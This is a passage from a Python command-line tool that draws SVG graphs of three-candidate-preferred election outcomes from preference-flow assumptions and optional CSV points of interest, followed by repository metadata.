    # (if red favours green, then red and green will be equal here)
    # degenerates to terpoint if equal ex-Red split
    # terpoint degeneration (A.red_to_blue == 0.5)
    b = 1.0/3.0
    g = 1.0/3.0
    if A.red_to_green == 0.0:
        b = 0.25
        g = 0.5
    elif A.red_to_blue == 0.0:
        b = 0.5
        g = 0.25
    elif A.red_to_blue < 0.5:
        # red's coming third and favouring green
        # we follow the b >= (r == g) line out of the terpoint
        # (1 - (b+g)) == g
        # 1 - b = 2g
        # g = (1 - b)/2
        # we also follow the green == blue 2CP from the hapoint
        # b + r * A.red_to_blue == g + r - r * A.red_to_blue == 0.5
        # b + r * A.red_to_blue = 0.5
        # b + (1 - (b+g))*A.red_to_blue = 0.5
        # b + (1 - (b + ((1-b)/2))) * A.red_to_blue = 0.5
        # b + (1 - (b + 0.5 - 0.5b)) * A.red_to_blue = 0.5
        # b + (1 - (b + 1)/2) * A.red_to_blue = 0.5
        # b + ((1 - b) * A.red_to_blue / 2) = 0.5
        # b - b*A.red_to_blue/2 + A.red_to_blue/2 = 0.5
        # 2b - b*A.red_to_blue + A.red_to_blue = 1
        # b * (2 - A.red_to_blue) + A.red_to_blue = 1
        # b = A.red_to_green / (2 - A.red_to_blue)
        b = A.red_to_green / (2 - A.red_to_blue)
        g = (1 - b)/2
    elif A.red_to_blue > 0.5:
        # transpose of the < 0.5 case...
        g = A.red_to_blue / (2 - A.red_to_green)
        b = (1 - g)/2
    (x6, y6) = (b, g)
    # 7. Green vs Blue on 45 (hapoint)
    # Also always some sort of boundary
    (x7, y7) = (0.5, 0.5)
    # Lines #3 - #6 - #7 represents the Blue/Green boundary
    blue_green = f'{line(x3, y3, x6, y6, A)} {line(x6, y6, x7, y7, A)}'
    # Unconditionally we also have a line down y = 1 - x
    # (this passes through the hapoint too, but no direction change)
    (xtop, ytop) = p2c(1.0 - A.stop, A.stop, A)
    (xright, yright) = p2c(A.stop, 1.0 - A.stop, A)
    top_right = f'M {xtop:g} {ytop:g} {xright:g} {yright:g}'
    # OK, time to draw all the lines!
    return f'\r\n<path d="{red_green} {red_blue} {blue_green} {top_right}" class="line" />\r\n'
def draw_pois(A: argparse.Namespace) -> str:
    """Draw points of interest, as appearing in the specified CSV file.

    Rows are (x=blue, y=green[, label]); malformed rows are reported on
    stderr and skipped. Returns the accumulated SVG fragments.
    """
    out = ""
    import csv  # local import: only needed when --input is given
    # NOTE(review): the open() handle is never closed; harmless for a
    # one-shot CLI but worth fixing if this becomes a library call.
    rdr = csv.reader(sys.stdin if A.input == "-" else open(A.input, 'r'))
    for row in rdr:
        try:
            r0 = float(row[0])
            r1 = float(row[1])
            if r0 + r1 > 1.0:
                raise ValueError("sum of X and Y columns must be <= 1")
            r2 = row[2] if len(row) > 2 else ""
            (x, y) = p2c(r0, r1, A)
            tooltip = f"{r2}\n{Party.GREEN.value[0]}: {r1:.1%}, {Party.RED.value[0]}: {(1 - (r1+r0)):.1%}, {Party.BLUE.value[0]}: {r0:.1%}.".replace(
                ".0%", "%")
            try:
                (winner, margin) = calculate_winner(1 - (r0 + r1), r1, r0, A)
                tooltip += f"\nWinner: {winner.value[0]} {margin:.1%}".replace(
                    ".0%", "%")
            except TypeError:  # unresolved tie: calculate_winner returned None
                tooltip += "\nWinner: TIE"
            out += f'<circle cx="{x:g}" cy="{y:g}" r="{A.radius:g}" class="d poi"><title>{tooltip}</title></circle>\r\n'
        except (TypeError, IndexError, ValueError) as e:
            print("Could not parse input row:", e, file=sys.stderr)
            print(row, file=sys.stderr)
    return out
def construct_svg(A: argparse.Namespace) -> str:
    """Returns an SVG of the graph for given parameters as specified in `A`.

    Paint order: <defs> (marker, keyline filter, CSS), background rect,
    the 3CP dot grid, change-of-winner lines, optional points of interest,
    the assumption labels, then both axes with tick marks.
    """
    # let's output some SVG!
    out = ""
    out += f'<svg viewBox="0 0 {A.width:.0f} {A.width:.0f}" version="1.1" xmlns="http://www.w3.org/2000/svg">'
    # Set up <defs> section, including our triangle marker, the keyline effect and our CSS
    css = DEFAULT_CSS
    if A.css:
        css = (A.css).read()
    out += '<defs>' + \
        f'<marker id="triangle" viewBox="0 0 10 10" \
        refX="1" refY="5" \
        markerUnits="strokeWidth" \
        markerWidth="{A.scale * 0.5}" markerHeight="{A.scale * 0.5}" \
        orient="auto"> \
        <path d="M 0 0 L 10 5 L 0 10 z"/> \
        </marker>' + \
        """<filter id="keylineEffect" color-interpolation-filters="sRGB">
        <feMorphology in="SourceGraphic" result="MORPH" operator="dilate" radius="1.5"/>
        <feComponentTransfer result="KEYLINE">
        <!-- invert colors -->
        <feFuncR type="linear" slope="-1" intercept="1" />
        <feFuncG type="linear" slope="-1" intercept="1" />
        <feFuncB type="linear" slope="-1" intercept="1" />
        </feComponentTransfer>
        <feMerge>
        <feMergeNode in="KEYLINE"/>
        <feMergeNode in="SourceGraphic"/>
        </feMerge>
        </filter>""" + \
        f'<style type="text/css"><![CDATA[ \
        {css} \
        ]]> \
        </style>' + \
        '</defs>'
    # place a bg rect
    out += f'<rect width="{A.width:.0f}" height="{A.width:.0f}" class="bg" />'
    # place our dots: one per (blue, green) grid cell where shares sum to <= 1
    for b in frange(A.start, (A.stop + A.step), A.step):
        for g in frange(A.start, (A.stop + A.step), A.step):
            if g + b > 1.0:
                continue
            out += construct_dot(b, g, A)
    # Draw change-of-winner lines
    out += draw_lines(A)
    # place points of interest
    if A.input:
        out += draw_pois(A)
    # draw labels saying assumptions (the three preference flows in use)
    out += f'<text x="{A.width - A.scale*12:g}" y="{2*A.scale:g}" style="font-size:{A.scale:g}">{Party.RED.value[0]} to {Party.GREEN.value[0]}: {100.0*A.red_to_green:.1f}%</text>'
    out += f'<text x="{A.width - A.scale*12:g}" y="{4*A.scale:g}" style="font-size:{A.scale:g}">{Party.GREEN.value[0]} to {Party.RED.value[0]}: {100.0*A.green_to_red:.1f}%</text>'
    out += f'<text x="{A.width - A.scale*12:g}" y="{6*A.scale:g}" style="font-size:{A.scale:g}">{Party.BLUE.value[0]} to {Party.RED.value[0]}: {100.0*A.blue_to_red:.1f}%</text>'
    (x0, y0) = p2c(A.start, A.start, A)
    (x0, y100) = p2c(A.start, A.stop, A)
    (x100, y0) = p2c(A.stop, A.start, A)
    # Draw Y axis
    out += f'<path d="M {x0:g} {A.width:g} V {y100:g}" style="stroke: #222; stroke-width: {A.scale * 0.2:g}px" marker-end="url(#triangle)"/>'
    out += f'<text transform="translate({(x0 - (A.offset - 1)*A.scale):g}, {A.width/2 :g}) rotate(270)" style="text-anchor:middle">{Party.GREEN.value[0]} 3CP</text>'
    for g in A.marks:
        if g > A.start and g <= (A.stop):
            (xpos, ypos) = p2c(A.start, g, A)
            out += f'<path d="M {xpos:g} {ypos:g} h {-A.scale:g}" style="stroke: #222; stroke-width: {A.scale * 0.2:g}px"/>'
            out += f'<text y="{(ypos + A.scale/2):g}" x="{(xpos - 3*A.scale):g}" style="font-size:{A.scale:g}; text-anchor:right; text-align:middle">{g:.0%}</text>'
    # Draw X axis
    out += f'<path d="M {0:g} {y0:g} H {x100:g}" style="stroke: #222; stroke-width: {A.scale * 0.2:g}px" marker-end="url(#triangle)"/>'
    out += f'<text x="{A.width/2:g}" y="{y0 + 3.5*A.scale:g}" style="text-anchor:middle">{Party.BLUE.value[0]} 3CP</text>'
    for b in A.marks:
        if b > A.start and b <= (A.stop):
            (xpos, ypos) = p2c(b, A.start, A)
            out += f'<path d="M {xpos:g} {ypos:g} v {A.scale:g}" style="stroke: #222; stroke-width: {A.scale * 0.2:g}px"/>'
            out += f'<text x="{xpos:g}" y="{ypos + 2*A.scale:g}" style="font-size:{A.scale}; text-anchor:middle">{b:.0%}</text>'
    out += "\r\n<!-- Generated by https://abjago.net/3pp/ -->\r\n"
    out += "</svg>"
    return out
def get_args(args=None) -> argparse.Namespace:
    """Build the CLI parser and parse *args*.

    Pass args='' (or []) for pure defaults, or leave as None to read
    sys.argv. DEFAULT VALUES are set here.
    """
    # FIX: dropped the shadowing `import argparse` (already imported at
    # module level), the stray f-prefixes on plain option strings, and the
    # "A.offset" rename artifact in the --offset help text.
    parser = argparse.ArgumentParser(description=f"Three-Candidate-Preferred Visualiser.\
        Constructs a 2D graph with {Party.BLUE.value[0]} on the X-axis, \
        {Party.GREEN.value[0]} on the Y-axis, and dots shaded by winning party.\
        Prints an SVG to standard output and optionally takes a CSV of points of interest.\
        N.B. all numeric values should be between zero and one.")
    parser.add_argument("--green-to-red", default=0.8, type=float,
                        help=f"{Party.GREEN.value[0]}-to-{Party.RED.value[0]} preference ratio (default: %(default)g)")
    parser.add_argument("--red-to-green", default=0.8, type=float,
                        help=f"{Party.RED.value[0]}-to-{Party.GREEN.value[0]} preference ratio (default: %(default)g)")
    parser.add_argument("--blue-to-red", default=0.7, type=float,
                        help=f"{Party.BLUE.value[0]}-to-{Party.RED.value[0]} preference ratio (default: %(default)g)")
    parser.add_argument("--start", default=0.2, type=float,
                        help="minimum X and Y axis value (default: %(default)g)")
    parser.add_argument("--stop", default=0.6, type=float,
                        help="maximum X and Y axis value (default: %(default)g)")
    parser.add_argument("--step", default=0.01, type=float,
                        help="precision of dots (default: %(default)g)")
    parser.add_argument('--scale', default=10, type=int,
                        help="pixels per percent (default: %(default)g)")
    parser.add_argument('--offset', default=5, type=int,
                        help="multiple of scale factor to offset axis by (default: %(default)g)")
    parser.add_argument("--marks", nargs='+', default=[i/10.0 for i in range(0, 10)], metavar="MARK", type=float,
                        help="place axis marks at these values (default: every 10%%)")
    parser.add_argument("--css", metavar='FILE',
                        type=argparse.FileType('r'), help="Use CSS from specified file")
    parser.add_argument(
        "--input", "-i", help="input CSV of points of interest (format: x, y, label) (pass - for standard input)")
    parser.add_argument("--output", "-o", type=argparse.FileType('w'),
                        default=sys.stdout, help="output SVG (default: standard output)")
    return (parser.parse_args(args))
def validate_args(A: argparse.Namespace) -> argparse.Namespace:
    """Sanity-check and derive settings in-place on the parsed namespace.

    Clamps step/start/stop and the preference flows into usable ranges,
    computes the pixel geometry, and fills in the three inverse flows.
    Returns the same namespace for chaining.
    """
    def _bound(value, lo, hi):
        # magnitude of value, forced into [lo, hi]
        return max(min(abs(value), hi), lo)

    A.step = _bound(A.step, 0.002, 0.05)
    # keep start at least ten dot-steps below the 50% midpoint
    A.start = _bound(A.start, 0.0, 0.5 - 10*A.step)
    # if (1 - stop) < start the graph gets wonky, so cap stop accordingly
    A.stop = min(abs(A.stop), 1 - A.start)
    # Pixel geometry: scale is pixels per percent, step is percent per dot.
    A.inner_width = A.scale * 100.0 * (A.stop - A.start)
    A.width = (A.offset + 1) * A.scale + A.inner_width  # margin right and top
    A.radius = 50.0 * A.scale * A.step
    # Preference flows live in [0, 1]; the reverse flows are their complements.
    for flow in ("green_to_red", "red_to_green", "blue_to_red"):
        setattr(A, flow, _bound(getattr(A, flow), 0.0, 1.0))
    A.green_to_blue = 1.0 - A.green_to_red
    A.red_to_blue = 1.0 - A.red_to_green
    A.blue_to_green = 1.0 - A.blue_to_red
    return A
# the main show!
if __name__ == "__main__":
    try:
        # validate_args also derives sizes and inverse flows in-place
        A = validate_args(get_args())
        # print(A, file=sys.stderr)
        print(construct_svg(A), file=A.output)
    except ValueError as e:
        # report anticipated bad-input errors cleanly instead of a traceback
        print(e, file=sys.stderr)
| alexjago/3pp-visualiser | visualise_cpv.py | visualise_cpv.py | py | 22,052 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "enum.Enum",
"line_number": 36,
"usage_type": "name"
},
{
"api_name": "argparse.Namespace",
"line_number": 46,
"usage_type": "attribute"
},
{
"api_name": "typing.Tuple",
"line_number": 46,
"usage_type": "name"
},
{
"api_name": "argparse.Namespace",
... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.